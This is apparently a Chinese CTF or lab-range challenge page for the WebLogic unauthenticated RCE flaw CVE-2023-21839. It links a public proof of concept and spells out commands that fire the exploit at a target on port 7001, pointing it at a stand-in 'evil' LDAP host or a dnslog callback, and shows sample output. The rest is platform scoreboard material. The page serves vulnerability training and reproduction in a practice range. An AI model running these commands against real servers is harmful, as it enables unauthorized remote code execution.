weblogic-RCE

题目描述：

Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

题目提示：

Oracle WebLogic Server是业界领先的应用程序服务器，用于使用Java EE标准构建企业应用程序，并以低拥有成本将其部署在可靠、可扩展的运行时。

在 Oracle 2023年1月安全公告日修复了这个漏洞。

CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作，当 JDK 版本过低或本地存在小工具（javaSerializedData）时，这可能会导致 RCE 漏洞

参考：

https://www.oracle.com/security-alerts/cpujan2023.html

复现：

https://github.com/4ra1n/CVE-2023-21839

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows

cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

DNS Log

CVE-2023-21839.exe -ip 192.168.25.129 -port 7001 -ldap ldap://kmi896.dnslog.cn/test
[*] your-ip: 192.168.25.129
[*] your-port: 7001
[*] your-ldap: ldap://kmi896.dnslog.cn/test
[*] weblogic 12
[*] id=2 LocateRequest
[*] id=3 RebindRequest
[*] id=4 RebindRequest
[*] id=5 LocateRequest
[*] id=6 ResolveRequest
[*] id=7 ResolveRequest

作者

snow

解题次数

一血

暂无

消耗金币

分数

100

最高奖励

创建题目环境

提交

您尚未登录，请登录或注册后评论

0 人参与 | 0 条评论

个人空间

创建题目

竞赛列表

创建比赛

题目

解题

分数

金币

暂无解题记录

知识点

任意文件读取反序列化命令执行本地靶场 SSRF 代码审计代码执行文件上传权限提升签到

题目分类

CVE 39
REV 1
WEB 33
签到 1

分数排行

F1rstb100d
2100
3099967366@qq.com
1200
cjz-chen
900
tim
600
snow
400
youxia
200
yaemiko1024
200
霞鸣
200
恐怖直立猿
200
yj233
100